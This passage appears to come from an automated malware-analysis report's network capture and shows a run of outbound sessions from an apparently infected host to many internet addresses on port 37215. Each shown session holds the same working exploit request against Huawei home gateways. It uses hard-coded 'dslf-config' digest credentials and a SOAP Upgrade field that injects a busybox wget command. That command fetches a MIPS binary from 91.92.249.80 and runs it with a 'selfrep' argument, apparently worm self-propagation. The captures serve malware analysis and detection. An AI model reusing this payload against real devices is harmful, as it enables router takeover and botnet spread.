                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          478192.168.2.2355858106.219.38.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190685987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          479192.168.2.2335732197.194.125.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190695047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          480192.168.2.2356042197.241.33.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190701962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          481192.168.2.233470241.133.91.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190746069 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          482192.168.2.234509841.96.207.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191714048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          483192.168.2.2338122157.74.98.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191790104 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          484192.168.2.234066041.11.216.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191797018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          485192.168.2.235835841.33.203.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191798925 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          486192.168.2.234328441.51.196.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191852093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          487192.168.2.233402841.67.243.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191854954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          488192.168.2.233639841.75.167.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191915035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
